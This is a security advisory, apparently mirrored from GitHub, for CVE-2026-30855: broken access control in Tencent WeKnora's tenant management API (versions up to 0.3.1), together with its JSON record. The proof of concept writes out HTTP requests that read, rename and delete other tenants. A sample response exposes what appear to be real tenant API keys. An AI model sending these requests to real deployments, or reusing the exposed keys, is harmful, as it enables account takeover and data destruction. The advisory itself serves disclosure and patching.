GHSA-CCJ6-79J6-CQ5Q

Vulnerability from github – Published: 2026-03-06 23:53 – Updated: 2026-03-09 13:21
VLAI?
Summary
WeKnora Vulnerable to Broken Access Control in Tenant Management
Details

Summary

An authorization bypass in tenant management endpoints of WeKnora application allows any authenticated user to read, modify, or delete any tenant by ID. Since account registration is open to the public, this vulnerability allows any unauthenticated attacker to register an account and subsequently exploit the system. This enables cross-tenant account takeover and destruction, making the impact critical.

Details

The tenant management handlers do not validate that the caller owns the tenant or has cross-tenant privileges. The handlers parse the tenant ID from the path and directly call the service layer with that ID, returning or mutating the tenant without authorization checks.

Affected handlers: - GET /api/v1/tenants lists all tenants without ownership checks - GET /api/v1/tenants/{id} reads any tenant by ID without ownership checks - PUT /api/v1/tenants/{id} allows updating any tenant by ID without ownership checks - DELETE /api/v1/tenants/{id} allows deleting any tenant by ID without ownership checks

These endpoints do not enforce cross-tenant permissions or deny-by-default behavior, unlike ListAllTenants and SearchTenants.

PoC

1) Register a new account as a user in Tenant 10025 and obtain a bearer token or API key.

2) Read details of other tenants:

  • Request that uses API key via the X-API-Key header:

    ```http GET /api/v1/tenants HTTP/1.1 Host: localhost Connection: keep-alive X-Request-ID: 2TpH2S0sHyi1 X-API-Key: sk--HmGzVTrUW-p334ddZzJnucebiWBZ63AH5qKVO0EY4QNrELd sec-ch-ua-platform: "macOS" User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36 Accept: application/json, text/plain, / sec-ch-ua: "Not(A:Brand";v="8", "Chromium";v="144", "Google Chrome";v="144" sec-ch-ua-mobile: ?0 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://weknora.serviceme.top/platform/knowledge-bases Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9

    ```

  • Response (truncated for brevity):

    ```http HTTP/1.1 200 OK Server: nginx/1.28.0 Date: Fri, 06 Feb 2026 03:12:22 GMT Content-Type: application/json; charset=utf-8 Connection: close X-Request-Id: 2TpH2S0sHyi1 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Referrer-Policy: strict-origin-when-cross-origin

    { "data": { "items": [ { "id": 10025, "name": "injokerr's Workspace", "api_key": "sk--HmGzVTrUW-p334ddZzJnucebiWBZ63AH5qKVO0EY4QNrELd", "status": "active" }, { "id": 10001, "name": "viaim_yuweilong", "api_key": "sk-hocFTPZIYW9ixuUNbFidgSQ5eciSVcJkzE8Ns3BI6Ev-8cFe", "status": "active" } ] }, "success": true } ... ```

With API keys, we can do anything on the victim account's behalf, including reading sensitive data (LLM API keys, knowledge bases), modifying configurations, etc.

Requests to perform modification and deletion of another tenant.

1) Modify the victim tenant:

  • Request:
  • Method: PUT
  • URL: http://localhost:8088/api/v1/tenants/10001
  • Header: Authorization: Bearer <ATTACKER_TOKEN>
  • Body: { "name": "HACKED by tenant 10025" }

  • Expected response:

  • 200 OK with the updated tenant object.

4) Delete the victim tenant:

  • Request:
  • Method: DELETE
  • URL: http://localhost:8088/api/v1/tenants/10001
  • Header: Authorization: Bearer <ATTACKER_TOKEN>

  • Expected response:

  • 200 OK and the tenant is deleted.

Impact

This is a Broken Access Control (BOLA/IDOR) vulnerability in tenant management of WeKnora. Any user can access, modify, or delete tenants belonging to other customers, resulting in cross-tenant data exposure, account takeover, and destructive actions against other tenants. Moreover, when the account is taken over, attacker can read configured models to unauthorizedly extract sensitive data such as API keys of LLM services.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.3.1"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/Tencent/WeKnora"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.3.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-30855"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-284"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-06T23:53:53Z",
    "nvd_published_at": "2026-03-07T17:15:53Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\nAn authorization bypass in tenant management endpoints of WeKnora application allows any authenticated user to read, modify, or delete any tenant by ID. Since account registration is open to the public, this vulnerability allows any unauthenticated attacker to register an account and subsequently exploit the system. This enables cross-tenant account takeover and destruction, making the impact critical.\n\n### Details\nThe tenant management handlers do not validate that the caller owns the tenant or has cross-tenant privileges. The handlers parse the tenant ID from the path and directly call the service layer with that ID, returning or mutating the tenant without authorization checks.\n\nAffected handlers:\n- `GET /api/v1/tenants` lists all tenants without ownership checks\n- `GET /api/v1/tenants/{id}` reads any tenant by ID without ownership checks\n- `PUT /api/v1/tenants/{id}` allows updating any tenant by ID without ownership checks\n- `DELETE /api/v1/tenants/{id}` allows deleting any tenant by ID without ownership checks\n\nThese endpoints do not enforce cross-tenant permissions or deny-by-default behavior, unlike `ListAllTenants` and `SearchTenants`.\n\n### PoC\n1) Register a new account as a user in Tenant 10025 and obtain a bearer token or API key.\n\n2) Read details of other tenants:\n\n  - Request that uses API key via the `X-API-Key` header:\n\n    ```http\n    GET /api/v1/tenants HTTP/1.1\n    Host: localhost\n    Connection: keep-alive\n    X-Request-ID: 2TpH2S0sHyi1\n    X-API-Key: sk--HmGzVTrUW-p334ddZzJnucebiWBZ63AH5qKVO0EY4QNrELd\n    sec-ch-ua-platform: \"macOS\"\n    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36\n    Accept: application/json, text/plain, */*\n    sec-ch-ua: \"Not(A:Brand\";v=\"8\", \"Chromium\";v=\"144\", \"Google Chrome\";v=\"144\"\n    sec-ch-ua-mobile: ?0\n    Sec-Fetch-Site: same-origin\n    Sec-Fetch-Mode: cors\n    Sec-Fetch-Dest: empty\n    Referer: https://weknora.serviceme.top/platform/knowledge-bases\n    Accept-Encoding: gzip, deflate, br, zstd\n    Accept-Language: en-US,en;q=0.9\n\n\n    ```\n\n\n  - Response (truncated for brevity):\n\n    ```http\n    HTTP/1.1 200 OK\n    Server: nginx/1.28.0\n    Date: Fri, 06 Feb 2026 03:12:22 GMT\n    Content-Type: application/json; charset=utf-8\n    Connection: close\n    X-Request-Id: 2TpH2S0sHyi1\n    X-Frame-Options: SAMEORIGIN\n    X-Content-Type-Options: nosniff\n    X-XSS-Protection: 1; mode=block\n    Referrer-Policy: strict-origin-when-cross-origin\n\n    {\n        \"data\": {\n            \"items\": [\n                {\n                    \"id\": 10025,\n                    \"name\": \"injokerr\u0027s Workspace\",\n                    \"api_key\": \"sk--HmGzVTrUW-p334ddZzJnucebiWBZ63AH5qKVO0EY4QNrELd\",\n                    \"status\": \"active\"\n                },\n                {\n                    \"id\": 10001,\n                    \"name\": \"viaim_yuweilong\",\n                    \"api_key\": \"sk-hocFTPZIYW9ixuUNbFidgSQ5eciSVcJkzE8Ns3BI6Ev-8cFe\",\n                    \"status\": \"active\"\n                }\n            ]\n        },\n        \"success\": true\n    }\n    ...\n    ```\n\nWith API keys, we can do anything on the victim account\u0027s behalf, including reading sensitive data (LLM API keys, knowledge bases), modifying configurations, etc.\n\nRequests to perform modification and deletion of another tenant.\n\n1) Modify the victim tenant:\n\n- Request:\n  - Method: `PUT`\n  - URL: `http://localhost:8088/api/v1/tenants/10001`\n  - Header: `Authorization: Bearer \u003cATTACKER_TOKEN\u003e`\n  - Body: `{ \"name\": \"HACKED by tenant 10025\" }`\n\n- Expected response:\n  - `200 OK` with the updated tenant object.\n\n4) Delete the victim tenant:\n\n- Request:\n  - Method: `DELETE`\n  - URL: `http://localhost:8088/api/v1/tenants/10001`\n  - Header: `Authorization: Bearer \u003cATTACKER_TOKEN\u003e`\n\n- Expected response:\n  - `200 OK` and the tenant is deleted.\n\n### Impact\n\nThis is a Broken Access Control (BOLA/IDOR) vulnerability in tenant management of WeKnora. Any user can access, modify, or delete tenants belonging to other customers, resulting in cross-tenant data exposure, account takeover, and destructive actions against other tenants. Moreover, when the account is taken over, attacker can read configured models to unauthorizedly extract sensitive data such as API keys of LLM services.",
  "id": "GHSA-ccj6-79j6-cq5q",
  "modified": "2026-03-09T13:21:37Z",
  "published": "2026-03-06T23:53:53Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Tencent/WeKnora/security/advisories/GHSA-ccj6-79j6-cq5q"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30855"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Tencent/WeKnora"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "WeKnora Vulnerable to Broken Access Control in Tenant Management"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…